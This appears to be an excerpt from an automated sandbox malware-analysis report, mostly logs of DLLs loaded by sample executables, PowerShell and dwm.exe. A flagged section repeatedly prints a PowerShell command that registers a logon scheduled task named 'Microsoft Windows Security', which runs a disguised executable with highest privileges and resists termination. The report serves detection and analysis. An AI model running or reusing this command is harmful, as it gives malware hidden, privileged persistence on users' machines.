Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\34D7.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source:	Binary string: wkernel32.pdb source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
